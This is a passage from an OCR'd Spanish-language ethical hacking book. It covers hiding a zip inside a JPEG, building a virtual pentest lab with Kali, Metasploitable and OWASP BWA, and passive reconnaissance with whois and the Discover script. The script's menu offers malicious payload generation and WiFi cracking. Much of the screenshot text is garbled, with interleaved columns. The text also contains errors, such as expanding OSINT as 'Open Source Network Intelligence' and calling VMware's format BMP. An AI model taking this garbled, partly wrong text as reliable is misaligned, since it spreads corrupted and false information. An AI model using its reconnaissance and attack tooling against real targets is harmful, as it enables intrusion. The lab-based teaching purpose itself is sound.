con un secreto en el archivo secreto.txt, y queremos 
mandarlo a alguien oculto en una imagen, de forma que 


para nadie más se vea sospechoso. 





Imagen WS.jpg secreto, txt 


AAA secreto,txt peters | =| © © o 
oe oF 
secreto del libro] 


f Plain Text = Tab Width: 8 ¥ in 1, Colis X INS 
! a 


Vamos a empezar por comprimir el archivo en un .zip 





& Open With Text Editor Return 
Open With Other Application 

Cut Ctri+x 
Copy Ctrl 3 
Move fo... 

Copy to... 

Move to Trash Delete 





Rename... F 


secreto.zip 





` Compress 
Star 


Properties 
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Ahora, vamos a ocultar el archivo compreso en la 
imagen ImagenWS.jpg utilizando el comando cat 
secreto.zip > ImagenWS.jpg 
:~/Desktop# ls 
jpg secreto.txt 
:~/Desktop# cat secreto.zip > Imagenws | 
:~/Desktop# | 





¡Listo! Así de sencillo es ocultar un archivo dentro de 
una imagen, para comprobar que funciono, voy a borrar 
los archivos secreto.txt y secreto.zip y voy a sacar el 
archivo oculto de la imagen con el comando unzip 
ImagenWS.jpg. 
‘~/Desktop# rm secreto.* 
‘~/Desktop# Ls 


:~/Desktop# unzip ImagenwWs. j 


Archive:  ImagenWS.Jpg 
inflating: secreto.txt 
‘~/Desktop# ls 
| SEC Elon Exe 
‘~/Desktop# cat secreto.txt 
secreto del libro 
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Preparación del laboratorio 


Antes de iniciar con la metodología de hacking, 
necesitas tu propio laboratorio de hacking, es 
decir, un ambiente controlado en el que puedas 
practicar y probar los ataques que aprendes sin 
comprometer a sistemas internos, para esto, 


utilizaremos lo que se conoce como virtualización. 


Virtualización 


La virtualización es la creación de un ambiente 
virtual por medio de software. Velo como una caja 
de arena dentro de otra caja de arena, la segunda 
caja de arena está aislada y corre sobre la primera, 
así que, si se crea algún problema en la 
máquina virtual, no causara problemas con la 
máquina principal, que es una de las principales 
razones, es decir, puedes hacer ataques, 
malwares, etc. contra un sistema virtual sin temor a 
afectar a tu sistema principal. 

Otra razón por lo cual la virtualización es muy Útil, 


es mientras este prendida la máquina virtual divide 
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los recursos de la computadora principal para 
asignarle a este, y mientras está apagada no 
utiliza recursos, así que no hará nuestro sistema 
principal más lento o menos poderoso por tener 
muchas máquinas virtuales. 

Así también si se causa algún error en una 
máquina virtual, podemos simplemente eliminarla 
o tener un respaldo antes de que diera el error. 
Existen dos softwares grandes que vamos a utilizar 
para esto, uno es VirtualBox, y el otro es VMware, 
el primero es software 100% abierto y gratis, hecho 
por Oracle, y el segundo es de paga, aunque tiene 
una versión gratis, sugiero usar VMware si tienes 
un sistema Windows, y VirtualBox si tienes un 
sistema OSX. En seguida explicaré como montar tu 
laboratorio en cada uno de estos sistemas. 

Cabe mencionar que dentro de virtualización hay 
algunos conceptos que debes conocer. Por 
ejemplo, el formato .1ISO, casi siempre significa que 
es el disco de instalación de un sistema 
operativo, es decir, tienes que montar el disco en la 


maquina virtual, e instalar el sistema operativo 
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como en cualquier máquina por medio de un disco 
virtual para que este funcione. Otro formato 
común, y más fácil de utilizar, es el OVF y el VMX, 
estos son formatos de importación, son mucho 
más fáciles de utilizar, el OVF es el formato abierto, 
es decir, es compatible con ambos VirtualBox y 
VMware, sin embargo, el formato BMP es el que 
usa VMware, así que batallaras un poco más si 
intentas importarlos en VirtualBox, sin embargo, si 
es posible utilizarlos también en VirtualBox, 
adicionalmente, existe el formato VMDK, también 
de VMware, este formato es para un disco o un 
almacenaje de una máquina virtual existente, es el 
equivalente a un disco duro en el mundo real, es 
posible utilizarlo para importar y mover máquinas 
de un ambiente virtual a otro. 

Para tener un laboratorio en el que podamos 
practicar todo lo que se ve en este curso, sugiero 


instalar los siguientes sistemas: 
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1, Kali Linux 
Este es una distribución de Linux basada en debían 
diseñada específicamente para pruebas de 
penetración, es decir, para realizar ataques y 
pruebas informáticas, puedes encontrar los 
archivos en kali.org/downloads para instalarlo, sin 
embargo, te sugiero instalar el que está en 
whitesuithacking.com/material-libro, teniendo 
cómo ventaja que fue modificado por mí y contiene 
herramientas extras que se verán en este libro que 
el sistema original no tiene. 

2. Windows 7 
Este sistema sugiero instalarlo para practicar 
algunos de los ataques más comunes a sistemas 
Windows, debido a que muchas vulnerabilidades 
de Windows 7 y de los Windows Servers funcionan 
igual. 

3. Metasploitable 
Este sistema simula un ambiente Linux vulnerable 
en diferentes formas, desde ataques por medio de 


ftp, hasta algunos por medio de samba, será muy 
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útil para practicar cómo atacar servidores Linux y 
que esperar al hacerlo. 

4. OWASP Broken Web Application Project 

(BWAP) 

Este sistema fue diseñado por la OWASP para que 
practiques como hackear aplicaciones y páginas 
web, tiene algunos ejemplos desde para practicar 
SQLi hasta para practicar hackear WordPress, asi 


que es particularmente útil. 


Sugiero descargar estos archivos (son bastante 
ligeros) antes de seguir con la siguiente sección 
para que los instales. 

Estos sistemas los puedes descargar de su 
fuente oficial, o de 
https://whitesuithacking.com/material-libro, 
donde subi los archivos de instalación para 
facilitarte el encontrarlos. 

Adicionalmente, encontrarás en esa página, 
videotutoriales GRATIS para ayudarte al 
proceso de la instalación, y todas las 
herramientas que necesites en este libro. 
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Windows 8 Macintosh 


En Windows es fácil crear un laboratorio, 
especialmente si gozas de muchos recursos en tu 
sistema, en seguida explicaré como hacerlo con 
ambos softwares en su versión gratis, y algunos de 
los posibles problemas que podrías tener. 

Es importante mencionar que tu procesador tiene 
que soportar virtualización (VT), aunque la mayoría 
de los procesadores lo soportan, así que si tienes 


una máquina moderna no deberías de preocuparte 
de esto. 
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El proceso es el mismo en Macintosh, la diferencia 
es que en este sistema recomiendo más utilizar 
VirtualBox a VMware, sin embargo, los procesos 
de instalación son virtualmente los mismos en 


todos los sistemas operativos. 


VMware 


Lo primero que hay que hacer, es descargar 
VMware, la mejor opción es VMware Workstation 
Pro, pero no es gratis, así que la segunda mejor 
opción sería VMware Workstation Player, que 
funciona bastante bien, puedes encontrar este 
software gratis en https://vmware.com, en la 
sección de “Downloads”, instálalo en tu 


computadora, y tendrás una pantalla similar a esta: 
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| Player y | z BHi 


Welcome to VMware 
Workstation 14 Player 





FEE. Create a New Virtual Machine 
$ kas Create a new virtual machine, which will then be added to 
AS the top of your library. 
y Open a Virtual Machine 
| ; EL i Open an existing virtual machine, which will then be added 
<< to the top of your library. 
NG 


Download a virtual appliance from the marketplace. You 


| ¿31 Download a Virtual Appliance 
| 1 can then open it in Player. 

| 

| 

1 


Help 





View online help. 





al 
PPP Rie RASbamnentententntensmnsnesn: A RS AA 





Lo segundo que debes hacer, es descargar el .ISO 
o sistema(s) que vayas a instalar en tu laboratorio, 
como ejemplo, voy a mostrar como instalar Kali, 
sin embargo, el proceso es el mismo en cualquier 
sistema que instales por medio de un ISO, solo 
debes seguir la instalación. 


Primero, hay que descargar el archivo del sistema. 





VMware Workstation 14 Player 
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Posteriormente, debemos crear una 


nueva maquina virtual en VMware 








— Bt 


Create a New Virtual Machine 


Create a new virtual machine, which will then be added to she top of your library, 





à 
=I. Open a Virtual Machine 
F I | Open an existing virtual machine, which will then be added to the top of your library. 


er Download a Virtual Appliance 


e] Download a virtual appliance from the marketplace. You can then open it in Player, 


_ Help 
NY = View online help. 


Y, seguimos el instalador realizando los siguientes 


pasos: 








New Virtual Machine Wizard 





Welcome to the Hew Virtual Machine Wizard 


A virtual machine is ike a physical computer; it needs an operating 
system. How will you install the guest operating system? 





Install from: 
O Installer disc: 
- CD Drive (Es) WD Unlocker 


(9) Instaler disc image file (iso): 
| F:\05\Maquina WSH.iso 


A Could not detect which operating system is in this disc image. 
You will need to specify which operating system will be installed, 





vi Browse... 


O wil install the operating system later, 
The virtual machine will be ceated with a blank hard disk. 


New Virtual Machine Wizard 





Guest operating system 
O Microsoft Windows 
(9) Linux 


© Novel NetWare 
O Solaris 
O other 


Version 


¡Debian 9.x 


Select a Guest Operating System 
Which operating system will be installed on this virtual machine? 








ESTO JE 
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Aquí le pones el nombre que quieras que tenga, y 


la ubicación donde quieres que se grabe: 


Y el número de GB que quieres que tenga tu 
máquina de almacenaje (nota, no se consumen 
hasta que los consumas dentro de la máquina 
virtual). Asegúrate de ponerle suficiente basado en 
que tanto usaras tu sistema, ya que, aunque 
posible, es tedioso modificarlo después (Yo sugiero 
50GB). ; 





New Virtual Machine Wizard 





Specify Disk Capacity 
How large do you want this disk to be? 








The virtual machine's hard disk is stored as one or more files on the host computer's 
physical disk. These file(s) start small and become larger as you add applications, 
files, and data to your virtual machine, 


Maximum disk size (GB): | 50 | i ba J 


Recommended size for Debian 9.x: 20 GB 


O Store virtual disk as a single file 
(8) Split virtual disk into multiple files 


Splitting the disk makes it easier to move the virtual machine to another computer 
but may reduce performance with very large disks. 








| Hep | | <Bak || Next> || Cancel | 
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[i | Other Devices: CD/DVD, USE Controller, Printer, Sound Card 
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Aquí es donde vas a configurar cuanta RAM 
quieren que tenga su máquina virtual (mientras 
más tenga, mejor maneja múltiples procesos), y 
también que tipo de adaptador red quieres que 
tenga, en seguida enlistare tus dos principales 


opciones: 







Hardware 

























| <Bak i| Fh ¿| cami i 
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Device Summary | á y 
y = | Speafy the amount of memory allocated to this wig” 
env 5128 j machine, The memory size must be a multiple of 4 
== e i} Processors i 
| a CD/DVD (DE) Using file F:\O5 Maquina WS... Memory for this virtual madine: 532 ie Me 
| EoNetwork Adapter MAT 3 
Ready to Create Virtual Machine usB acho Present 
Click Friish to create the virtual machine. Then you œn irsta Debian 9.x. i e a 
S 
© Sound Card Auto detect wee 
E —— == = Printer Present 
3 The virtual machine wil be created with the folowing settings: Tlvspiay Auto detect RES 
E —— SS > fe EGE E Maximum recommended mane 
i Kad Libro A 2 Menory swapping may 
i Locstor: D:\Pocuments Wir tual Machines Kati Libro 262 sone a SS ae 
i Version: Workstation 14,x 163 20m 
Operating System: Debian 9,x si2mM2 «A a aida 

E | it imer memory 
l; Hard Disk; 50 G3, Spit 128 Ma Sa 
1i | Memory: 512 MB led 
(i | Network Adapter: NAT ajos ~ E Guest Srecni i 


64 MS 
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1. NAT 

Esto significa que tendrás acceso al internet, pero 
no a la red local (LAN), es decir, no podrás atacar a 
ninguna computadora fuera de tu máquina, aunque 
si podrías atacar sistemas con IPs Globales, como 
lo son las páginas web. Recomiendo este modo si 
no quieres poner en riesgo otros sistemas en tu red 
local, o si estas en una red en la qué no le asigna 


el DHCP IP local a tu máquina virtual. 


2. Conexión Puente (bridged) 
Este tipo de conexión le da a la interfaz de tu 
máquina virtual una conexión puente a la interfaz de tu 
sistema principal, lo que le permite tener una dirección 
IP en la LAN, Proveyendo a tu sistema virtual tener 
acceso a recursos y sistemas en la red local. 
Esta es mi configuración preferida porque mientras que 
este en una red personal de forma que no afecte 


negativamente a nadie con mis pruebas. 
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Hardware 






















| E i y Device status 
Device Summary á 
ee i ¿Comnecte: 
HA Memory 512 MB ` 
Boas i M Connect at power on 
“¿New CD/DVD (IDE) Using file F:1OS Maquina WS... 
E Network Adapter NAT Network connection 
USB Controller Present O Bridged: Connected directly to the physical network 
D Sound Card Auto detect | Repkcate physical network connection state . 
sh Printer Present $ | 
Display Auto detect (9) NAT: Used to share the host's IP address Ñ 


O Host-only: A private network shared with the host 
( Custom: Specific virtual network 





Viinet® 
(O LAN segment: 






Kali Linux 





| i State: Powered Off 

| | OS: Debian 9.x 

| | Version: Workstation 14.x virtual machine 
RAM: 2 GB 


[LAN Segments... | | advanced... 


| [P Play virtual-machine 
| 





| i ‘if Edit virtual machine settings 





* Para ver instrucciones de instalación de Kali, ver la 


Una vez que terminemos con esto, hacemos clic en sección de Instalando Kali Linux. 


finish, y listo, tenemos una máquina virtual en nuestro 


VMware. 


El sistema aún no está instalado, así que debemos 





hacer clic en “play” (el botón verde) para inicializar el 


sistema e instalarlo. 
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VirtualBox 


Para instalar el sistema en VirtualBox, el proceso es 
muy similar al anterior, deberás primeramente 


descargar el programa de _https://virtualbox.org, y 
luego de haber terminado la instalación, crear una 


nueva maquina virtual. 


E 9 Tacte YA ata LAO 
t 
E e tixchre Hola 





Welcome to Virtuaoxt 

herbal Sag n Paion bets at sy hil Sees araf ye bat MADE GAO Oe 
I computer the tol be anghy row betast yasharadi crested ar ore 

unes yei 


there to amar a mtaa UN, EA A Here DUAA A Da aa fas bow 
faceted el He tap po pn are 


i Yue can; gueto tra U2. Ley de get puso! Pod, ds vent sico. ham an for ware 
i meron and utas none 





Create Virtual Machine 


Name and operating system 





Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install on 
it. The name you choose will be used throughout VirtualBox to 
identify this machine. 


Name: | 
F A = _ y 4 
Type: ¡Linux = a O E 
f ANT > DEA ATT = i 
i 3 








Version: Debian (32bit) - z3 o | 


‘Seer Wade Es 
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OPEN 





€& Create Virtual Machine 


Memory size 


Select the amount of memory (RAM) in megabytes to be 
allocated to the virtual machine. 


The recommended memory size is 1024 MB. 


—— PREETI 3072 $j MB 
4MB 65536 MB 

Next | Cancel | 

EA 3 












© = Create Virtual Machine 


Hard disk 


If you wish you can add a virtual hard disk to the new machine. 
You can either create a new hard disk file or select one from 
the list or from another location using the folder icon. 


If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine is created, 
The recommended size of the hard disk is 8.00 GB. 


©) Do not add a virtual hard disk 







(8) Create a virtual hard disk now 
O Use an et virtual hard disk file 


Empty 












WHITE SUIT 










Create Virtual Hard Disk 


Hard disk file type 


Please choose the type of file that you would ike to use for the new virtual 
hard disk. If you do not need to use it with other virtualization software you 
can leave this setting unchanged. 


(9) VDI (VirtualBox Disk Image) 
O) VHD (Virtual Hard Disk) 
© VMDK (Virtual Machine Disk) 















© Create Virtual Hard Disk 


Storage on physical hard disk 


Please choose whether the new virtual hard disk file should grow as it is used 
(dynamically allocated) or if it should be created at its maximum size (fixed 
size). 


A dynamically allocated hard disk file will only use space on your physical 
hard disk as it fills up (up to a maximum fixed size), although it will not shrink 
again automatically when space on itis freed. 


A fixed size hard disk file may take longer to create on some systems but is 
often faster to use, 


@ Dynamically allocated 
©) Fixed size 
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| € Create Virtual Hard Disk 


File location and size 


Please type the name of the new virtual hard disk file into the box below or dick | 
on the folder icon to select a different folder to create the file in, 


$ 
[Kali Linux ia 


Select the size of the virtual hard disk in megabytes, This size is the limit on the 
amount of file data that a virtual machine will be able to store on the hard disk. 


| ere: 21] 


as VO) OS AE RN AR Eis 


4.00 MB 2.00 TB 


¿storage 













i Storage Devices = 
‘igs Controles: ¡DE 





CTA Perocve Dat trom Yadira! eee 


¡Ce Serio! Ports 


FA uss 


ical Shred Folders i 
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E ali Linux - Siih 5 o Pe p a 

Dee o _ 3 Sistemas Operativos 

| je] General i System | 

| EF System | Motherboard Processor Acceleration . Z e .£ . 

ax | el ; | a Ahora, te guiaré para la instalación de varios 

| a torage iia pd ae j j j j 

| a q Ss , _— Y [100% EE) sistemas operativos, que, sugiero instales antes de 
| EEP Network continuar para que puedas practicar 





adecuadamente todos los ataques que veremos en 


j le 
USB 





Shared Folders į 


EP | 
| a Serial Ports | 
110 
¡| La 

CJ 

E] 


este libro. 


User Interface | 


| Todos estos sistemas excepto Android (también se 
= ae | Cancel ] | 


Debemos decirle a la máquina, que ISO va a 





puede, pero por simplicidad, es más fácil usar un 
utilizar para instalar el sistema operativo. Seguimos emulador externo) pueden ser instalados bastante 


la ruta Settings > Storage > Empty(disco) > fácil en VMware o VirtualBox. Mientras tengas 


a a a ‘i ri i . 
Optical Drives > Choose file y seleccionamos memoria para instarlos puedes instalar todos los 


. r , r j m ¡ 
nuestro archivo ISO dónde está nuestro sistema sistemas operativos ya que no toman otros 


. | recursos (com i i 
operativo. (como procesamiento o RAM) mientras 


, sal ; e están 
Para instalar Kali Linux, véase la sección apagadas 


Instalando Kali Linux. 





Después de estos pasos, simplemente 
presionamos el botón “Start”, o “Iniciar”, e iniciamos 
el proceso de instalación. 

Nota: En VirtualBox, en algunos sistemas como 
Kali, se debe de activar la opción PAE en la 
sección de procesador. 
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PA 


Instalando Kali Linux 


Al iniciar, te aparecerá una ventana similar a esta: | Y 
9 
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Boot menu 
WHITE SUIT 


menu 


ts gk Magnus) 
re O /pest) 
: = - AE IE 


Live (B86 E e > Tai 1S a 
Live (forensi i 
sir as Sistence ‘f T 

ives B Encrypted Persistence) £ 

f I 
Graphical install 


Install with speech synt HER is 
Advanced options 











seled a language 


Aquí te permite varias opciones. La primera te 





Choose the language to be used for the installation process. The selected language will also be the 
default language for the Installed system. 


permitirá utilizar el sistema sin instalarlo, la ventaja de 


CHIIMeSs e (simpuneu - xu 














Chinese (Traditional) - *PxX(H0) 





es que te ahorras tiempo de instalación, ya que se | e = sent 

© a a . ‘ | Danish - Dansk 

inicia inmediatamente; la desventaja, es que todo lo Dutch - Nederlands X 
Dzongkha - En 


que hagas se borra al apagar el sistema. | E Le 


Esperanto - Esperanto 

r P a : i Estonian - Eesti 

Así que se optará por instalar el sistema, en la Finnish -suomi | 
French - Français | 

opción: “Graphical Install” on Sil | 
` German - Deutsch 5 


Screenshot | _ Go Back || Continue — Continue | 
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Después de esto, primero seleccionamos el 


lenguaje. 





Configure the keyboard 










Keymap to use: 


American English 





¿Albanian 

| Arabic 

| Asturian 
Bangladesh 
| Belarusian 





| 
Bengall | 
| Belgian 
| Bosnian 
| Brazilian 
| British English 
| | Bulgarian (BDS layout) l 
|| Bulgarian (phonetic layout} | 
H 


| 
| || Burmese | 
| Canadian French 


a 


$ 


| Canadian Multilingual 
¡Calalan__ — - 


w 
h. 





Go Back | | continue 





] Screenshot 
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Luego el teclado que utilizamos y el usuario 


Configure the network 









- Please enter the hostname for this system. 


: The hostname Is a single word that Identifies your system to the network. If you don't know what your 
- hostname should be, consult your network administrator, IF you are setting up your own home network, 
: you can make something up here. 


E Hostname: 


alvhitesultHacking | 


| Go Back i| Continue ) 





; Screenshot | 
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Y la contraseña de nuestro usuario root (la 


contraseña default es toor). 


Set up users and passwords 


You need to set a password for ‘root’, the system administrative accounl, A malicious or unqualified user 
with root access can have disastrous results, so you should take care to choose a root password that Is 
not easy to guess. It should not be a word found In dictionaries, or a word that could be easily 
associated with you. 


A good password will contain a mixture of letters, numbers and punctuation and should be changed at 
regular Intervals, 


The root user should not have an empty password. If you leave this empty, the root account will be 
disabled and the system's Initial user account will be given the power to become root using the “sudo” 
command, 


Note that you will not be able to see the password as you type it. 
Root password: 








"PUBS 


(Gel ASA A A RATA 


ti Show Password In Clear 


Please enter the same root password again to verify that you have typed it correctly, 
Re-enter password to venfy: 


| 


0 Show Password in Clear 


A TER } 
Screenshot ` 
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| GoBack || Continue | 












Hr] 


| KALI | 





BY OFFERSIVE SECURITY 


Configure the clock 


If the desired time zone Is not listed, then please go back to the step "Choose language” and select a 
country that uses the desired time zone (the country where you live or are located). 


Select your time zone: 


Eastern a 7 


Mountain 

| pacific 

| Alaska 
Hawaii 

| Arizona 
East Indiana 
Samoa 


- o ee 


| Screenshot | | Go Back ; || Continue | 
La zona horaria que se utilizara. Y lo siguiente 


sugiero seguir las instrucciones de las imágenes. 
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Si decidiste descargar el que está en mi página al 


| iniciarlo, para que se auto configure, deberás 





Finish the installation 


escribir en una consola de comandos esto: 


Installation complete 
Installation ls complete, so it is time to boot Into your new system. Make sure to remove the 
3 installation media, so that you boot into the new system rather than restarting the installation. 







Jetc/init.d/ws start 


“File Edit View Search Terminal Help 


A a al A El oe o AE start 













an oe ATT Adicionalmente, para actualizarlo la siguiente vez, 


A A A A AA SS ee 





deberás escribir en la consola de comandos lo 
siguiente: 


apt-get update && apt-get upgrade -y 


Recomiendo actualizarlo mínimo una vez a la 


semana, y de ser posible, siempre antes de 


usarlo. 








128 129 















WHITE Sy WHITE SUIT 


| virtual al Machin Settings x 
























Instalando Windows 7 
Hardware Options 
En este caso, descarga la ISO de la pagina de [evi Summary pm 
= | E Memory 6.168 eres 
materiales, y crea una maquina virtual de Windows Fue 1 [connect at power on 
; Connection 
7 en VMware o VirtualBox, y cargaras en el : een pa 
ISS Contoler Present Mi rr ===> E 
apartado de disco el ISO, luego de esto, solo po nc eo E 
saui j | Boisply Auto detect ~ 
prende la máquina y sigue el proceso de | [ 
instalación común de Windows. | | 3 
| | 
Aquí es donde agregaremos el ISO en las | 
configuraciones de VMware. | 
| | 
| 
o R 
| a o 


Y aquí es donde agregaremos el ISO en las 


configuraciones de VirtualBox 
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Ahora, va a variar un poco dependiendo si usas 











VMware o VirtualBox, así que mencionare ambas 

























[a] System Storage Devices ——————————— | Attributes - — = 
— és Controller: IDE Optical Drive: |IDE Secondary Master y ormas. 
Display i (J tive CD/DVD 
¿2% Controller; SATA Information — 33 
: Qa Type: — 
Kali Linux. vai sue a VMware 
Location; — 
Attached to: 
Esta es la forma más sencilla, ya que simplemente 
| Gia) shared Fotders tienes que jalar el archivo .VMX a VMware y 
| Em ne | aceptar la importación. 
| se) @eBBs | Metasploitable.nvram 11/25/2017 5:32 PM VMware Virtual M... 
| > & Metasploitable.vmdk 10/18/2018 8:32AM VMware virtual dis... 
| R | Th Metasploitable.vrmsd 3/21/2012 1:46 AM VMware snapshot .. 
[E] Metasploitable.vmx| 10/18/2018 8:32 AM ¥Mware virtual m- 






'% Metasploitable.vina 5/21/2012 1:37 AM VMware Team Me... 
Cuando termines el proceso de instalacion, te i | 
recomiendo desactivar el antivirus de Windows, las Edit View VM labs Help | =>. 
actualizaciones automáticas, y el firewall para que Otra alternativa es > bree a Cien | 






simplemente abrir el 


Open... Ctrl+0 


no interfieran con las practicas. 









archivo desde VMware en Scan for Virtual Machines... 
. a J Close Tab Ctrl+W 
Instalando Linux Vulnerable de pruebas archivos, abrir, y luego ; 
| , | hi El Connect to Server... Ctrl+L 
, y seleccionar el archivo =e ) 
Para instalar Metasploitable 2, que es el Linux gy Virtualize a Physical Machine... 
sg .VMmxX. Export to OVF., 
vulnerable que utilizaremos para nuestras E) Map Virtual Disks., 





prácticas, en tu laboratorio virtual, primero Exit 
descárgalo de la página de materiales, y seguido 


de eso, descomprimelo. 
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VirtualBox 


En VirtualBox el proceso es ligeramente más tardado, 
pero decentemente sencillo, aun así, tendremos que 


crear una máquina virtual de Linux (Ubuntu funciona 


bien). 





ya Oracte YH VirtualBox Manager 


Presiona siguiente, ponle mínimo 500 Mb de RAM, 
y cuando llegues a la siguiente pantalla, selecciona 


la opción de utilizar un disco de almacenamiento 


que ya existe, haz clic en la opción de elegir 


archivos, y selecciona el archivo .VMDK. 


© Create Virtual Machine 


Hard disk 








PAP 










Create Virtual Machine 


Name and operating system 





Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install on 
it, The name you choose will be used throughout VirtualBox to 
identify this machine. 


Mame: |Metasploitable 


Type: E SS “| Ba 


Version: ‘Ubuntu SS) GS 













Í | 
Pert ee 


aD 
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If you wish you can add a virtual hard disk to the new machine. 
You can either create a new hard disk file or select one from 
the list or from another location using the folder icon. 


If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine is created, 
The recommended size of the hard disk is 10.00 GB. 
(0 Do not add a virtual hard disk 


(Ù) Create a virtual hard disk now 









(8) Use an existing virtual hard disk file 


'Metasploitable, vmdk (Normal, 8.00 GE) Y 


F pms a wed = 7 
Create | Cancel | 


Y listo, presiona crear, e inicia la máquina virtual. 
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Instalando emulador Android 


En el caso de Android, para este libro es opcional, 
ya que bien podrías utilizar tu celular Android para 
realizar las prácticas, pero si no tienes un 
Smartphone Android, o prefieres no hacer pruebas 
en este, una opción (entre muchas, esta NO es la 
única alternativa) es utilizar el emulador de Android 
NOX, que puedes instalar en http://bignox.com/ . 
Para instalarlo, simplemente sigue el proceso de 
cualquier instalador en Windows o Macintosh, solo 
al momento de descargar en la página, selecciona 
la versión compatible con tu sistema (en mi caso 
me aparece en el botón rojo la versión de 
Windows, pero como puedes ver, abajo hay un 


botón para descargar en Mac). 
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Simplemente sigue el proceso, y para instalar 
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aplicaciones podras hacerlo desde el navegador 


del Android emulado, o jalando los archivos .APK 


al sistema. 
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ás 


Instalando servidor web vulnerable | 


Para instalar este sistema, es el mismo proceso 
que Metasploitable, selecciona e importa el 
archivo .VMX si estás usando VMware, o importa el 
disco .VMDK si estás utilizando VirtualBox en una 
máquina virtual Linux (Ubuntu por ejemplo 


funciona). 





| 
1 OWASP Broken Web Apps.nvram 10/13/2018 1:40PM = VMware Virtually 
1 OWASP Broken Web Apps.vmsd 7/30/2015 10:25 PM VMware snaps ' 
ml OWASP Broken Web Apps.vrnx 10/13/2018 1:40PM VMware virtual 
|A OWASP Broken Web Apps.wrmd 9/23/2018 6:12 PM 
2 OWASP Broken Web Apps-cllvmdk 10/9/2018 4:00 PM 


ag | 
VMware Team M 
VMware virtual dí 
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Reconocimiento 


Ahora que ya tienes tu laboratorio de pentesting 
listo para utilizar, empezaremos con la metodología 
de prueba de penetración. De aquí en adelante 
casi todo será practico, así que sugiero seguir las 
prácticas de este libro en tu laboratorio, y practicar 
cada fase las veces que necesites hasta que lo 


domines. 


La primera pregunta que se hace es ¿qué es 
reconocimiento? Si pusiste atención en la primera 
sección de libro, recordarás que el reconocimiento, 
o “Intelligence Gathering”, como lo encontrarías en 
inglés, es la fase en la que obtienes información 
relevante a tu objetivo, desde correos, profesión, 
topología de la red, puertos y servicios, sistema 
operativo, etc.; y esencialmente existen dos tipos 
de reconocimiento, el reconocimiento activo, y el 
reconocimiento pasivo. En esta sección veremos 


ambos y por qué son importantes. 
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Reconocimiento pasivo 


El reconocimiento pasivo, es el tipo de 
reconocimiento que no interactúa con el sistema 
directamente para obtener información de este, 
sino que, utiliza fuentes externas, como Google, 
Bing, Shodan, Builtwith, etc, para obtener 
información de este, por medio de búsquedas. 
Piénsalo como cuando en tu secundaria te gustaba 
una chica o chico, y en vez de preguntarle 
directamente “¿te gusto?”, le preguntas a tu 
amiga/o que le preguntara a su amiga/o (una 
cadena), este tipo de reconocimiento pasivo se 
conoce como OSINT: Open Source Network 
Intelligence. 

Tenemos algunas ventajas y desventajas de 
obtener información por este medio, primero las 
ventajas, es información rápida, sin riesgo de ser 
detectados, y potencialmente encontrar bastante 
información, ya que no es inusual que las 
organizaciones cometan errores en el manejo de 


su información pública, sin embargo, conlleva 
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algunas desventajas como que esta no sea 
confiable y obtener menos informacion relevante 
que el reconocimiento directo. 

Sin embargo, la utilidad del reconocimiento pasivo 
no debe de ser ignorado, ya que, en casi todos los 
casos, se obtiene informacion relevante para la 


prueba de penetracion. 


Informacion de dominios 


Whois es un protocolo para busqueda de bases de 
datos de registro de dominios, e informacion de 
paginas web. 

Puedes hacer búsquedas Whois en servicios tales 
como http://who.is/whois/, pero, en varias de las 
herramientas próximas se hacen búsquedas Whois 
automatizadas. 

De esta forma puedes saber a qué nombre está 
registrado un dominio, a que IP/servidor se conecta 
el DNS, que hosting está utilizando y más 
información que puede ser útil; en algunos casos 


se puede obtener la dirección del administrador de 


alguna página web y/o el teléfono personal de este. 
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OSINT - Obtener correos, numeros, 
nombres y otras cosas 


Discover es un script hecho en bash para OSINT 
que es muy útil en diferentes situaciones. Este 
script, aunque muy sencillo, potencialmente te 
ahorra horas de trabajo, ya que automatiza la 


ejecución de más de 10 herramientas por medio de 





sus scripts, como whois, TheHarvester, entre otras, 
las ejecuta todas al mismo tiempo, de forma que tu 
no tengas que correr una por una para obtener 
información de un objetivo. 

Adicionalmente, la forma en la que presenta los 
resultados es especialmente útil, ya que lo organiza 
en un HTML en un formato que te ayudará a 
reportar los resultados fácilmente, ya que te da la 
información ya organizada. 

Para utilizar esta herramienta, primero debemos 
irnos a la carpeta en la que está el script, el cual en 
nuestro sistema lo encontrarás en la carpeta 


lopt/Reconocimiento/discover 
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Para entrar a esta, basta con escribir el comando 
“cd” antes del directorio, de la siguiente forma: 
cd /opt/Reconocimiento/discover 
nt/Reconocimiento/discover* ls 
get-pip.py parsers  stash.sqlite 
LICENSE phantomjs update.sh 
mise README . md 
mods report 
notes resource 


Y si el archivo discover.sh no te aparece en verde 
cuando lo enlistas con Is, esto se debe porque no 
tiene permisos de ejecución, puedes resolverlo con 
el comando chmod +x discover.sh para darle 

adicionales permisos. 

Para ejecutar el archivo, deberás escribir 

./discover.sh 


‘/opt/Reconocimiento/discover# ./discover.sh 
Enseguida, se te abrira un menu de opciones, 





preguntandote que quieres hacer, como veras, esta 
herramienta tiene opciones desde RECON, que 
son para reconocimiento, hasta MISC, que son 
scripts variados que sirven para distintas | 


Operaciones como romper la seguridad de un wifi. 
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lige 
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CAN 
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WEB 
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MISC 
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N 

Domain 

Person 

Parse salesforce 


NING 

Generate target list 

CIDR 

List 

IP, range, or URL 

Rerun Nmap scripts and MSF aux, 


WHITES 
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| 
yi 


| 
| 


| 


Insecure direct object reference! 


Open multiple tabs in FUE TOX 
Nikto 
SSE 


Crack WiFi 

Parse XML 

Generate a malicious payload 
Start a Metasploit listener 
Update 

EXE 





Choice: 1 
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Para elegir una opción, escribes el número en la 
terminal, así que escribiremos el número 1, para 
utilizar un dominio para iniciar nuestro proceso de 


reconocimiento. 


Ya que estamos realizando reconocimiento pasivo, 


seleccionaremos la opción 1. 


RECON 


Passive 
Active 
Previous menu 





Choice: 1$ 
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Posteriormente, nos pedirá dos cosas, primero el así que piensa bien a qué organización pones en 
nombre de la organización, y la segunda, el l estos campos. 
dominio de esta, presionamos enter después de Después de haber presionado enter, 


escribir estos dos puntos. seleccionamos la opción N (de no), si no tienes 













una lista de nombres que importar, y esperamos, 
Uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvesi 


Metasploit, URLCrazy, Whois, multiple websites, and recon-n b un escaneo de estos puede tardar varios minutos 


[*] Acquire API keys for Bing, Builtwith, Fullcontact, Githul E en terminar. 


Google, Hashes, and Shodan for maximum results with recon-n: z 


Finalmente, te debe de salir una pantalla así, 


Ean ae i E E E A A A A A o ons Sa Some Ons ADS mr oe 
— e A A A A — (q Q— — >> A io id ae pc Å- 





